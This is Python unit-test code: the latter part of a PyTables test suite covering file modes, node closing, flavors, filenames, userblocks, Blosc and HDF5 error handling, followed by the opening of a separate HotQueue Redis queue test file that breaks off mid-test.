self.h5file.create_group('/', 'test2')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.move_node, '/test1', '/', 'test2')
def test10_fileCopyNodeClosed(self):
"""Test copying a node in a closed file."""
self.h5file.create_group('/', 'test1')
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.copy_node, '/test1', '/', 'test2')
def test11_fileCopyNodeRO(self):
"""Test copying a node in a read-only file."""
self.h5file.create_group('/', 'test1')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.copy_node, '/test1', '/', 'test2')
def test13_fileGetNodeClosed(self):
"""Test getting a node from a closed file."""
self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedFileError, self.h5file.get_node, '/test')
def test14_fileWalkNodesClosed(self):
"""Test walking a closed file."""
self.h5file.create_group('/', 'test1')
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError, next, self.h5file.walk_nodes())
def test15_fileAttrClosed(self):
"""Test setting and deleting a node attribute in a closed file."""
self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.set_node_attr, '/test', 'foo', 'bar')
self.assertRaises(ClosedFileError,
self.h5file.del_node_attr, '/test', 'foo')
def test16_fileAttrRO(self):
"""Test setting and deleting a node attribute in a read-only file."""
self.h5file.create_group('/', 'test')
self.h5file.set_node_attr('/test', 'foo', 'foo')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.set_node_attr, '/test', 'foo', 'bar')
self.assertRaises(FileModeError,
self.h5file.del_node_attr, '/test', 'foo')
def test17_fileUndoClosed(self):
"""Test undo operations in a closed file."""
self.h5file.enable_undo()
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError, self.h5file.is_undo_enabled)
self.assertRaises(ClosedFileError, self.h5file.get_current_mark)
self.assertRaises(ClosedFileError, self.h5file.undo)
self.assertRaises(ClosedFileError, self.h5file.disable_undo)
def test18_fileUndoRO(self):
"""Test undo operations in a read-only file."""
self.h5file.enable_undo()
self.h5file.create_group('/', 'test')
self._reopen('r')
self.assertEqual(self.h5file._undoEnabled, False)
# self.assertRaises(FileModeError, self.h5file.undo)
# self.assertRaises(FileModeError, self.h5file.disable_undo)
def test19a_getNode(self):
"""Test getting a child of a closed node."""
g1 = self.h5file.create_group('/', 'g1')
g2 = self.h5file.create_group('/g1', 'g2')
# Close this *object* so that it should not be used.
g1._f_close()
self.assertRaises(ClosedNodeError, g1._f_get_child, 'g2')
# Getting a node by its closed object is not allowed.
self.assertRaises(ClosedNodeError,
self.h5file.get_node, g1)
# Going through that *node* should reopen it automatically.
try:
g2_ = self.h5file.get_node('/g1/g2')
except ClosedNodeError:
self.fail("closed parent group has not been reopened")
# Already open nodes should be closed now, but not the new ones.
self.assertIs(g2._v_isopen, False,
"open child of closed group has not been closed")
        self.assertIs(g2_._v_isopen, True,
                      "newly opened child of a closed group is not open")
# And existing closed ones should remain closed, but not the new ones.
g1_ = self.h5file.get_node('/g1')
self.assertIs(g1._v_isopen, False,
"already closed group is not closed anymore")
self.assertIs(g1_._v_isopen, True,
"newly opened group is still closed")
def test19b_getNode(self):
"""Test getting a node that does not start with a slash ('/')."""
# Create an array in the root
self.h5file.create_array('/', 'array', [1, 2], title="Title example")
# Get the array without specifying a leading slash
self.assertRaises(NameError, self.h5file.get_node, "array")
def test20_removeNode(self):
"""Test removing a closed node."""
# This test is a little redundant once we know that ``File.get_node()``
# will reload a closed node, but anyway...
group = self.h5file.create_group('/', 'group')
array = self.h5file.create_array('/group', 'array', [1])
# The closed *object* can not be used.
group._f_close()
self.assertRaises(ClosedNodeError, group._f_remove)
self.assertRaises(ClosedNodeError, self.h5file.remove_node, group)
# Still, the *node* is reloaded when necessary.
try:
self.h5file.remove_node('/group', recursive=True)
except ClosedNodeError:
self.fail("closed node has not been reloaded")
        # Objects of descendant removed nodes
# should have been automatically closed when removed.
self.assertRaises(ClosedNodeError, array._f_remove)
self.assertNotIn('/group/array', self.h5file) # just in case
self.assertNotIn('/group', self.h5file) # just in case
def test21_attrsOfNode(self):
"""Test manipulating the attributes of a closed node."""
node = self.h5file.create_group('/', 'test')
nodeAttrs = node._v_attrs
nodeAttrs.test = attr = 'foo'
node._f_close()
self.assertRaises(ClosedNodeError, getattr, node, '_v_attrs')
# The design of ``AttributeSet`` does not yet allow this test.
## self.assertRaises(ClosedNodeError, getattr, nodeAttrs, 'test')
self.assertEqual(self.h5file.get_node_attr('/test', 'test'), attr)
def test21b_attrsOfNode(self):
"""Test manipulating the attributes of a node in a read-only file."""
self.h5file.create_group('/', 'test')
self.h5file.set_node_attr('/test', 'test', 'foo')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.set_node_attr, '/test', 'test', 'bar')
def test22_fileClosesNode(self):
"""Test node closing because of file closing."""
node = self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedNodeError, getattr, node, '_v_attrs')
def test23_reopenFile(self):
"""Testing reopening a file and closing it several times."""
self.h5file.create_array('/', 'test', [1, 2, 3])
self.h5file.close()
with tables.open_file(self.h5fname, "r") as h5file1:
self.assertEqual(h5file1.open_count, 1)
if tables.file._FILE_OPEN_POLICY == 'strict':
self.assertRaises(ValueError,
tables.open_file, self.h5fname, "r")
else:
with tables.open_file(self.h5fname, "r") as h5file2:
self.assertEqual(h5file1.open_count, 1)
self.assertEqual(h5file2.open_count, 1)
if common.verbose:
print("(h5file1) open_count:", h5file1.open_count)
print("(h5file1) test[1]:", h5file1.root.test[1])
self.assertEqual(h5file1.root.test[1], 2)
h5file1.close()
self.assertEqual(h5file2.open_count, 1)
if common.verbose:
print("(h5file2) open_count:", h5file2.open_count)
print("(h5file2) test[1]:", h5file2.root.test[1])
self.assertEqual(h5file2.root.test[1], 2)
class FlavorTestCase(common.TempFileMixin, TestCase):
"""Test that setting, getting and changing the ``flavor`` attribute of a
leaf works as expected."""
array_data = numpy.arange(10)
scalar_data = numpy.int32(10)
def _reopen(self, mode='r'):
super(FlavorTestCase, self)._reopen(mode)
self.array = self.h5file.get_node('/array')
self.scalar = self.h5file.get_node('/scalar')
return True
def setUp(self):
super(FlavorTestCase, self).setUp()
self.array = self.h5file.create_array('/', 'array', self.array_data)
self.scalar = self.h5file.create_array('/', 'scalar', self.scalar_data)
def test00_invalid(self):
"""Setting an invalid flavor."""
self.assertRaises(FlavorError, setattr, self.array, 'flavor', 'foo')
def test01_readonly(self):
"""Setting a flavor in a read-only file."""
self._reopen(mode='r')
self.assertRaises(FileModeError,
setattr, self.array, 'flavor',
tables.flavor.internal_flavor)
def test02_change(self):
"""Changing the flavor and reading data."""
for flavor in all_flavors:
self.array.flavor = flavor
self.assertEqual(self.array.flavor, flavor)
idata = array_of_flavor(self.array_data, flavor)
odata = self.array[:]
self.assertTrue(common.allequal(odata, idata, flavor))
def test03_store(self):
"""Storing a changed flavor."""
for flavor in all_flavors:
self.array.flavor = flavor
self.assertEqual(self.array.flavor, flavor)
self._reopen(mode='r+')
self.assertEqual(self.array.flavor, flavor)
def test04_missing(self):
"""Reading a dataset of a missing flavor."""
flavor = self.array.flavor # default is internal
self.array._v_attrs.FLAVOR = 'foobar' # breaks flavor
self._reopen(mode='r')
idata = array_of_flavor(self.array_data, flavor)
with self.assertWarns(FlavorWarning):
odata = self.array.read()
self.assertTrue(common.allequal(odata, idata, flavor))
def test05_delete(self):
"""Deleting the flavor of a dataset."""
self.array.flavor = 'python' # non-default
self.assertEqual(self.array.flavor, 'python')
self.assertEqual(self.array.attrs.FLAVOR, 'python')
del self.array.flavor
self.assertEqual(self.array.flavor, tables.flavor.internal_flavor)
self.assertRaises(AttributeError, getattr, self.array.attrs, 'FLAVOR')
def test06_copyDeleted(self):
"""Copying a node with a deleted flavor (see #100)."""
snames = [node._v_name for node in [self.array, self.scalar]]
dnames = ['%s_copy' % name for name in snames]
for name in snames:
node = self.h5file.get_node('/', name)
del node.flavor
# Check the copied flavors right after copying and after reopening.
for fmode in ['r+', 'r']:
self._reopen(fmode)
for sname, dname in zip(snames, dnames):
if fmode == 'r+':
snode = self.h5file.get_node('/', sname)
node = snode.copy('/', dname)
elif fmode == 'r':
node = self.h5file.get_node('/', dname)
self.assertEqual(node.flavor, tables.flavor.internal_flavor,
"flavor of node ``%s`` is not internal: %r"
% (node._v_pathname, node.flavor))
def test07_restrict_flavors(self):
# regression test for gh-163
all_flavors = list(tables.flavor.all_flavors)
alias_map = tables.flavor.alias_map.copy()
converter_map = tables.flavor.converter_map.copy()
identifier_map = tables.flavor.identifier_map.copy()
description_map = tables.flavor.description_map.copy()
try:
tables.flavor.restrict_flavors(keep=[])
self.assertLess(len(tables.flavor.alias_map), len(alias_map))
self.assertLess(
len(tables.flavor.converter_map),
len(converter_map))
finally:
tables.flavor.all_flavors[:] = all_flavors[:]
tables.flavor.alias_map.update(alias_map)
tables.flavor.converter_map.update(converter_map)
tables.flavor.identifier_map.update(identifier_map)
tables.flavor.description_map.update(description_map)
@unittest.skipIf('win' in platform.system().lower(), 'known bug: gh-389')
@unittest.skipIf(sys.getfilesystemencoding() != 'utf-8',
'need utf-8 file-system encoding')
class UnicodeFilename(common.TempFileMixin, TestCase):
unicode_prefix = u'para\u0140lel'
def _getTempFileName(self):
return tempfile.mktemp(prefix=self.unicode_prefix, suffix='.h5')
def setUp(self):
super(UnicodeFilename, self).setUp()
self.test = self.h5file.create_array('/', 'test', [1, 2])
# So as to check the reading
self._reopen()
def test01(self):
"""Checking creating a filename with Unicode chars."""
test = self.h5file.root.test
if common.verbose:
print("Filename:", self.h5fname)
print("Array:", test[:])
print("Should look like:", [1, 2])
self.assertEqual(test[:], [1, 2], "Values does not match.")
def test02(self):
"""Checking tables.is_hdf5_file with a Unicode filename."""
self.h5file.close()
if common.verbose:
print("Filename:", self.h5fname)
print(" tables.is_hdf5_file?:", tables.is_hdf5_file(self.h5fname))
self.assertTrue(tables.is_hdf5_file(self.h5fname))
def test03(self):
"""Checking is_pytables_file with a Unicode filename."""
self.h5file.close()
if common.verbose:
print("Filename:", self.h5fname)
print("is_pytables_file?:", tables.is_pytables_file(self.h5fname))
self.assertNotEqual(tables.is_pytables_file(self.h5fname), False)
@staticmethod
def _store_carray(name, data, group):
atom = tables.Atom.from_dtype(data.dtype)
node = tables.CArray(group, name, shape=data.shape, atom=atom)
node[:] = data
def test_store_and_load_with_non_ascii_attributes(self):
self.h5file.close()
self.h5file = tables.open_file(self.h5fname, "a")
root = self.h5file.root
group = self.h5file.create_group(root, 'face_data')
array_name = u'data at 40\N{DEGREE SIGN}C'
data = numpy.sinh(numpy.linspace(-1.4, 1.4, 500))
with warnings.catch_warnings():
warnings.simplefilter('ignore', NaturalNameWarning)
self._store_carray(array_name, data, group)
group = self.h5file.create_group(root, 'vertex_data')
@unittest.skipIf(sys.version_info < (3, 6),
'PEP 519 was implemented in Python 3.6')
class PathLikeFilename(common.TempFileMixin, TestCase):
def _getTempFileName(self):
from pathlib import Path
return Path(tempfile.mktemp(suffix='.h5'))
def setUp(self):
super(PathLikeFilename, self).setUp()
self.test = self.h5file.create_array('/', 'test', [1, 2])
# So as to check the reading
self._reopen()
def test01(self):
"""Checking creating a file with a PathLike object as the filename."""
test = self.h5file.root.test
if common.verbose:
print("Filename:", self.h5fname)
print("Array:", test[:])
print("Should look like:", [1, 2])
        self.assertEqual(test[:], [1, 2], "Values do not match.")
def test02(self):
"""Checking tables.is_hdf5_file with a PathLike object as the filename."""
self.h5file.close()
if common.verbose:
print("Filename:", self.h5fname)
print(" tables.is_hdf5_file?:", tables.is_hdf5_file(self.h5fname))
self.assertTrue(tables.is_hdf5_file(self.h5fname))
def test03(self):
"""Checking is_pytables_file with a PathLike object as the filename."""
self.h5file.close()
if common.verbose:
print("Filename:", self.h5fname)
print("is_pytables_file?:", tables.is_pytables_file(self.h5fname))
self.assertNotEqual(tables.is_pytables_file(self.h5fname), False)
def test04_str(self):
str(self.h5file)
class FilePropertyTestCase(TestCase):
def setUp(self):
super(FilePropertyTestCase, self).setUp()
self.h5fname = tempfile.mktemp(".h5")
self.h5file = None
def tearDown(self):
if self.h5file:
self.h5file.close()
if os.path.exists(self.h5fname):
os.remove(self.h5fname)
super(FilePropertyTestCase, self).tearDown()
def test_get_filesize(self):
data = numpy.zeros((2000, 2000))
datasize = numpy.prod(data.shape) * data.dtype.itemsize
self.h5file = tables.open_file(self.h5fname, mode="w")
self.h5file.create_array(self.h5file.root, 'array', data)
h5_filesize = self.h5file.get_filesize()
self.h5file.close()
fs_filesize = os.stat(self.h5fname)[6]
self.assertGreaterEqual(h5_filesize, datasize)
self.assertEqual(h5_filesize, fs_filesize)
def test01_null_userblock_size(self):
self.h5file = tables.open_file(self.h5fname, mode="w")
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.assertEqual(self.h5file.get_userblock_size(), 0)
def test02_null_userblock_size(self):
self.h5file = tables.open_file(self.h5fname, mode="w")
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.h5file.close()
self.h5file = tables.open_file(self.h5fname, mode="r")
self.assertEqual(self.h5file.get_userblock_size(), 0)
def test03_null_userblock_size(self):
USER_BLOCK_SIZE = 0
self.h5file = tables.open_file(
self.h5fname, mode="w", user_block_size=USER_BLOCK_SIZE)
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.assertEqual(self.h5file.get_userblock_size(), 0)
def test01_userblock_size(self):
USER_BLOCK_SIZE = 512
self.h5file = tables.open_file(
self.h5fname, mode="w", user_block_size=USER_BLOCK_SIZE)
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.assertEqual(self.h5file.get_userblock_size(), USER_BLOCK_SIZE)
def test02_userblock_size(self):
USER_BLOCK_SIZE = 512
self.h5file = tables.open_file(
self.h5fname, mode="w", user_block_size=USER_BLOCK_SIZE)
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.h5file.close()
self.h5file = tables.open_file(self.h5fname, mode="r")
self.assertEqual(self.h5file.get_userblock_size(), USER_BLOCK_SIZE)
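    # HDF5 only accepts a user block size of 0 or a power of two >= 512 bytes,
    # so both of the sizes used below are expected to be rejected.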
def test_small_userblock_size(self):
USER_BLOCK_SIZE = 12
self.assertRaises(ValueError, tables.open_file, self.h5fname, mode="w",
user_block_size=USER_BLOCK_SIZE)
def test_invalid_userblock_size(self):
USER_BLOCK_SIZE = 1025
self.assertRaises(ValueError, tables.open_file, self.h5fname, mode="w",
user_block_size=USER_BLOCK_SIZE)
# Test for reading a file that uses Blosc and was created on a big-endian platform
@unittest.skipIf(not common.blosc_avail, 'Blosc not available')
class BloscBigEndian(common.TestFileMixin, TestCase):
h5fname = test_filename("blosc_bigendian.h5")
def test00_bigendian(self):
"""Checking compatibility with Blosc on big-endian machines."""
# Check that we can read the contents without problems (nor warnings!)
for dset_name in ('i1', 'i2', 'i4', 'i8'):
a = numpy.arange(10, dtype=dset_name)
dset = self.h5file.get_node('/'+dset_name)
self.assertTrue(common.allequal(a, dset[:]),
"Error in big-endian data!")
# Case test for Blosc and subprocesses (via multiprocessing module)
# The worker function for the subprocess (needs to be here because Windows
# has problems pickling nested functions with the multiprocess module :-/)
def _worker(fn, qout=None):
fp = tables.open_file(fn)
if common.verbose:
print("About to load: ", fn)
rows = fp.root.table.where('(f0 < 10)')
if common.verbose:
print("Got the iterator, about to iterate")
next(rows)
if common.verbose:
print("Succeeded in one iteration\n")
fp.close()
if qout is not None:
qout.put("Done")
# From: Yaroslav Halchenko <debian@onerussian.com>
# Subject: Skip the unittest on kFreeBSD and Hurd -- locking seems to
# be N/A
#
# on kfreebsd /dev/shm is N/A
# on Hurd -- inter-process semaphore locking is N/A
@unittest.skipIf(not multiprocessing_imported,
'multiprocessing module not available')
@unittest.skipIf(platform.system().lower() in ('gnu', 'gnu/kfreebsd'),
"multiprocessing module is not supported on Hurd/kFreeBSD")
@unittest.skipIf(not common.blosc_avail, 'Blosc not available')
class BloscSubprocess(TestCase):
def test_multiprocess(self):
# Create a relatively large table with Blosc level 9 (large blocks)
h5fname = tempfile.mktemp(prefix="multiproc-blosc9-", suffix=".h5")
try:
size = int(3e5)
sa = numpy.fromiter(((i, i**2, i//3)
for i in range(size)), 'i4,i8,f8')
with tables.open_file(h5fname, 'w') as h5file:
h5file.create_table(
h5file.root, 'table', sa,
filters=tables.Filters(complevel=9, complib="blosc"),
chunkshape=(size // 3,))
if common.verbose:
print("**** Running from main process:")
_worker(h5fname)
if common.verbose:
print("**** Running from subprocess:")
try:
qout = mp.Queue()
except OSError:
print("Permission denied due to /dev/shm settings")
else:
ps = mp.Process(target=_worker, args=(h5fname, qout,))
ps.daemon = True
ps.start()
result = qout.get()
if common.verbose:
print(result)
finally:
os.remove(h5fname)
class HDF5ErrorHandling(TestCase):
def setUp(self):
super(HDF5ErrorHandling, self).setUp()
self._old_policy = tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY
def tearDown(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = self._old_policy
super(HDF5ErrorHandling, self).tearDown()
def test_silence_messages(self):
code = """
import tables
tables.silence_hdf5_messages(False)
tables.silence_hdf5_messages()
try:
tables.open_file(r'%s')
except tables.HDF5ExtError as e:
pass
"""
filename = tempfile.mktemp(prefix="hdf5-error-handling-", suffix=".py")
try:
with open(filename, 'w') as fp:
fp.write(code % filename)
p = subprocess.Popen([sys.executable, filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertNotIn("HDF5-DIAG", stderr.decode('ascii'))
finally:
os.remove(filename)
def test_enable_messages(self):
code = """
import tables
tables.silence_hdf5_messages()
tables.silence_hdf5_messages(False)
try:
tables.open_file(r'%s')
except tables.HDF5ExtError as e:
pass
"""
filename = tempfile.mktemp(prefix="hdf5-error-handling-", suffix=".py")
try:
with open(filename, 'w') as fp:
fp.write(code % filename)
p = subprocess.Popen([sys.executable, filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertIn("HDF5-DIAG", stderr.decode('ascii'))
finally:
os.remove(filename)
def _raise_exterror(self):
h5fname = tempfile.mktemp(".h5")
open(h5fname, 'wb').close()
try:
h5file = tables.open_file(h5fname)
h5file.close()
finally:
os.remove(h5fname)
def test_h5_backtrace_quiet(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = True
with self.assertRaises(tables.HDF5ExtError) as cm:
self._raise_exterror()
self.assertIsNotNone(cm.exception.h5backtrace)
def test_h5_backtrace_verbose(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = "VERBOSE"
with self.assertRaises(tables.HDF5ExtError) as cm:
self._raise_exterror()
self.assertIsNotNone(cm.exception.h5backtrace)
msg = str(cm.exception)
self.assertIn(cm.exception.h5backtrace[-1][-1], msg)
def test_h5_backtrace_ignore(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = False
with self.assertRaises(tables.HDF5ExtError) as cm:
self._raise_exterror()
self.assertIsNone(cm.exception.h5backtrace)
class TestDescription(TestCase):
def test_isdescription_inheritance(self):
# Regression test for gh-65
class TestDescParent(IsDescription):
c = Int32Col()
class TestDesc(TestDescParent):
pass
self.assertIn('c', TestDesc.columns)
def test_descr_from_dtype(self):
t = numpy.dtype([('col1', 'int16'), ('col2', float)])
descr, byteorder = descr_from_dtype(t)
self.assertIn('col1', descr._v_colobjects)
self.assertIn('col2', descr._v_colobjects)
self.assertEqual(len(descr._v_colobjects), 2)
self.assertIsInstance(descr._v_colobjects['col1'], Col)
self.assertIsInstance(descr._v_colobjects['col2'], Col)
self.assertEqual(descr._v_colobjects['col1'].dtype, numpy.int16)
self.assertEqual(descr._v_colobjects['col2'].dtype, float)
def test_descr_from_dtype_rich_dtype(self):
header = [(('timestamp', 't'), 'u4'),
(('unit (cluster) id', 'unit'), 'u2')]
t = numpy.dtype(header)
descr, byteorder = descr_from_dtype(t)
self.assertEqual(len(descr._v_names), 2)
self.assertEqual(sorted(descr._v_names), ['t', 'unit'])
def test_descr_from_dtype_comp_01(self):
d1 = numpy.dtype([
('x', 'int16'),
('y', 'int16'),
])
d_comp = numpy.dtype([
('time', 'float64'),
('value', d1)
#('value', (d1, (1,)))
])
descr, byteorder = descr_from_dtype(d_comp)
self.assertTrue(descr._v_is_nested)
self.assertIn('time', descr._v_colobjects)
self.assertIn('value', descr._v_colobjects)
self.assertEqual(len(descr._v_colobjects), 2)
self.assertIsInstance(descr._v_colobjects['time'], Col)
self.assertTrue(isinstance(descr._v_colobjects['value'],
tables.Description))
self.assertEqual(descr._v_colobjects['time'].dtype, numpy.float64)
def test_descr_from_dtype_comp_02(self):
d1 = numpy.dtype([
('x', 'int16'),
('y', 'int16'),
])
d_comp = numpy.dtype([
('time', 'float64'),
('value', (d1, (1,)))
])
with self.assertWarns(UserWarning):
descr, byteorder = descr_from_dtype(d_comp)
self.assertTrue(descr._v_is_nested)
self.assertIn('time', descr._v_colobjects)
self.assertIn('value', descr._v_colobjects)
self.assertEqual(len(descr._v_colobjects), 2)
self.assertIsInstance(descr._v_colobjects['time'], Col)
self.assertTrue(isinstance(descr._v_colobjects['value'],
tables.Description))
self.assertEqual(descr._v_colobjects['time'].dtype, numpy.float64)
def test_dtype_from_descr_is_description(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
t = dtype_from_descr(TestDescParent)
self.assertEqual(t, dtype)
def test_dtype_from_descr_is_description_instance(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
t = dtype_from_descr(TestDescParent())
self.assertEqual(t, dtype)
def test_dtype_from_descr_description_instance(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
        description = Description(TestDescParent().columns)
        t = dtype_from_descr(description)
self.assertEqual(t, dtype)
def test_dtype_from_descr_dict(self):
# See gh-152
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
t = dtype_from_descr({'col1': Int16Col(), 'col2': FloatCol()})
self.assertEqual(t, dtype)
def test_dtype_from_descr_invalid_type(self):
# See gh-152
self.assertRaises(ValueError, dtype_from_descr, [])
def test_dtype_from_descr_byteorder(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
t = dtype_from_descr(TestDescParent, byteorder='>')
self.assertEqual(t['col1'].byteorder, '>')
self.assertEqual(t['col2'].byteorder, '>')
def test_str_names(self):
# see gh-42
d = {'name': tables.Int16Col()}
descr = Description(d)
self.assertEqual(sorted(descr._v_names), sorted(d.keys()))
self.assertIsInstance(descr._v_dtype, numpy.dtype)
        self.assertEqual(sorted(descr._v_dtype.fields.keys()),
                         sorted(d.keys()))
class TestAtom(TestCase):
def test_atom_attributes01(self):
shape = (10, 10)
a = Float64Atom(shape=shape)
self.assertEqual(a.dflt, 0.)
self.assertEqual(a.dtype, numpy.dtype((numpy.float64, shape)))
self.assertEqual(a.itemsize, a.dtype.base.itemsize)
self.assertEqual(a.kind, 'float')
self.assertEqual(a.ndim, len(shape))
# self.assertEqual(a.recarrtype, )
self.assertEqual(a.shape, shape)
self.assertEqual(a.size, a.itemsize * numpy.prod(shape))
self.assertEqual(a.type, 'float64')
def test_atom_copy01(self):
shape = (10, 10)
a = Float64Atom(shape=shape)
aa = a.copy()
self.assertEqual(aa.shape, shape)
def test_atom_copy02(self):
dflt = 2.0
a = Float64Atom(dflt=dflt)
aa = a.copy()
self.assertEqual(aa.dflt, dflt)
def test_atom_copy_override(self):
shape = (10, 10)
dflt = 2.0
a = Float64Atom(shape=shape, dflt=dflt)
aa = a.copy(dflt=-dflt)
self.assertEqual(aa.shape, shape)
self.assertNotEqual(aa.dflt, dflt)
self.assertEqual(aa.dflt, -dflt)
class TestCol(TestCase):
def test_col_copy01(self):
shape = (10, 10)
c = Float64Col(shape=shape)
cc = c.copy()
self.assertEqual(cc.shape, shape)
def test_col_copy02(self):
dflt = 2.0
c = Float64Col(dflt=dflt)
cc = c.copy()
self.assertEqual(cc.dflt, dflt)
def test_col_copy_override(self):
shape = (10, 10)
dflt = 2.0
pos = 3
c = Float64Col(shape=shape, dflt=dflt, pos=pos)
cc = c.copy(pos=2)
self.assertEqual(cc.shape, shape)
self.assertEqual(cc.dflt, dflt)
self.assertNotEqual(cc._v_pos, pos)
self.assertEqual(cc._v_pos, 2)
class TestSysattrCompatibility(TestCase):
def test_open_python2(self):
h5fname = test_filename("python2.h5")
with tables.open_file(h5fname, "r") as h5file:
self.assertTrue(h5file.isopen)
def test_open_python3(self):
h5fname = test_filename("python3.h5")
with tables.open_file(h5fname, "r") as h5file:
self.assertTrue(h5file.isopen)
def suite():
theSuite = unittest.TestSuite()
niter = 1
for i in range(niter):
theSuite.addTest(unittest.makeSuite(OpenFileFailureTestCase))
theSuite.addTest(unittest.makeSuite(NodeCacheOpenFile))
theSuite.addTest(unittest.makeSuite(NoNodeCacheOpenFile))
theSuite.addTest(unittest.makeSuite(DictNodeCacheOpenFile))
theSuite.addTest(unittest.makeSuite(CheckFileTestCase))
theSuite.addTest(unittest.makeSuite(ThreadingTestCase))
theSuite.addTest(unittest.makeSuite(PythonAttrsTestCase))
theSuite.addTest(unittest.makeSuite(StateTestCase))
theSuite.addTest(unittest.makeSuite(FlavorTestCase))
theSuite.addTest(unittest.makeSuite(UnicodeFilename))
theSuite.addTest(unittest.makeSuite(PathLikeFilename))
theSuite.addTest(unittest.makeSuite(FilePropertyTestCase))
theSuite.addTest(unittest.makeSuite(BloscBigEndian))
theSuite.addTest(unittest.makeSuite(BloscSubprocess))
theSuite.addTest(unittest.makeSuite(HDF5ErrorHandling))
theSuite.addTest(unittest.makeSuite(TestDescription))
theSuite.addTest(unittest.makeSuite(TestAtom))
theSuite.addTest(unittest.makeSuite(TestCol))
theSuite.addTest(unittest.makeSuite(TestSysattrCompatibility))
return theSuite
if __name__ == '__main__':
common.parse_argv(sys.argv)
common.print_versions()
unittest.main(defaultTest='suite')
## Local Variables:
## mode: python
## End:
|
tests.py
|
# -*- coding: utf-8 -*-
"""Test suite for the HotQueue library. To run this test suite, execute this
Python program (``python tests.py``). Redis must be running on localhost:6379,
and a list key named 'hotqueue:testqueue' will be created and deleted in db 0
several times while the tests are running.
"""
from time import sleep
import threading
import unittest
try:
import cPickle as pickle
except ImportError:
import pickle
from hotqueue import HotQueue
class DummySerializer(object):
"""Dummy serializer that deliberately discards messages on dumps."""
@staticmethod
def dumps(s):
return "foo"
@staticmethod
def loads(s):
return s
class HotQueueTestCase(unittest.TestCase):
def setUp(self):
"""Create the queue instance before the test."""
self.queue = HotQueue('testqueue')
def tearDown(self):
"""Clear the queue after the test."""
self.queue.clear()
def test_arguments(self):
"""Test that HotQueue.__init__ accepts arguments correctly, and that
the Redis key is correctly formed.
"""
kwargs = {
'name': "testqueue",
'serializer': DummySerializer,
'host': "localhost",
'port': 6379,
'db': 0}
# Instantiate the HotQueue instance:
self.queue = HotQueue(**kwargs)
# Ensure that the properties of the instance are as expected:
self.assertEqual(self.queue.name, kwargs['name'])
self.assertEqual(self.queue.key, "hotqueue:%s" % kwargs['name'])
self.assertEqual(self.queue.serializer, kwargs['serializer'])
# Instantiate a HotQueue instance with only the required args:
self.queue = HotQueue(kwargs['name'])
# Ensure that the properties of the instance are as expected:
self.assertEqual(self.queue.name, kwargs['name'])
self.assertEqual(self.queue.key, "hotqueue:%s" % kwargs['name'])
        # Defaults to cPickle when available, pickle otherwise.
        self.assertTrue(self.queue.serializer is pickle)
def test_consume(self):
"""Test the consume generator method."""
nums = [1, 2, 3, 4, 5, 6, 7, 8]
# Test blocking with timeout:
self.queue.put(*nums)
msgs = []
for msg in self.queue.consume(timeout=1):
msgs.append(msg)
self.assertEqual(msgs, nums)
# Test non-blocking:
self.queue.put(*nums)
msgs = []
for msg in self.queue.consume(block=False):
msgs.append(msg)
self.assertEqual(msgs, nums)
def test_cleared(self):
"""Test for correct behaviour if the Redis list does not exist."""
self.assertEqual(len(self.queue), 0)
self.assertEqual(self.queue.get(), None)
def test_get_order(self):
"""Test that messages are get in the same order they are put."""
alphabet = ['abc', 'def', 'ghi', 'jkl', 'mno']
self.queue.put(alphabet[0], alphabet[1], alphabet[2])
self.queue.put(alphabet[3])
self.queue.put(alphabet[4])
msgs = []
msgs.append(self.queue.get())
msgs.append(self.queue.get())
msgs.append(self.queue.get())
msgs.append(self.queue.get())
msgs.append(self.queue.get())
self.assertEqual(msgs, alphabet)
def test_length(self):
"""Test that the length of a queue is returned correctly."""
self.queue.put('a message')
self.queue.put('another message')
self.assertEqual(len(self.queue), 2)
def test_worker(self):
"""Test the worker decorator."""
colors = ['blue', 'green', 'red', 'pink', 'black']
# Test blocking with timeout:
self.queue.put(*colors)
msgs = []
@self.queue.worker(timeout=1)
def appender(msg):
msgs.append(msg)
appender()
self.assertEqual(msgs, colors)
# Test non-blocking:
self.queue.put(*colors)
msgs = []
@self.queue.worker(block=False)
def appender(msg):
msgs.append(msg)
appender()
self.assertEqual(msgs, colors)
# Test decorating a class method:
self.queue.put(*colors)
msgs = []
class MyClass(object):
@self.queue.worker(block=False)
def appender(self, msg):
msgs.append(msg)
my_instance = MyClass()
my_instance.appender()
self.assertEqual(msgs, colors)
def test_threaded(self):
"""Threaded test of put and consume methods."""
msgs = []
def put():
for num in range(3):
self.queue.put('message %d' % num)
sleep(0.1)
def consume():
for msg in self.queue.consume(timeout=1):
msgs.append(msg)
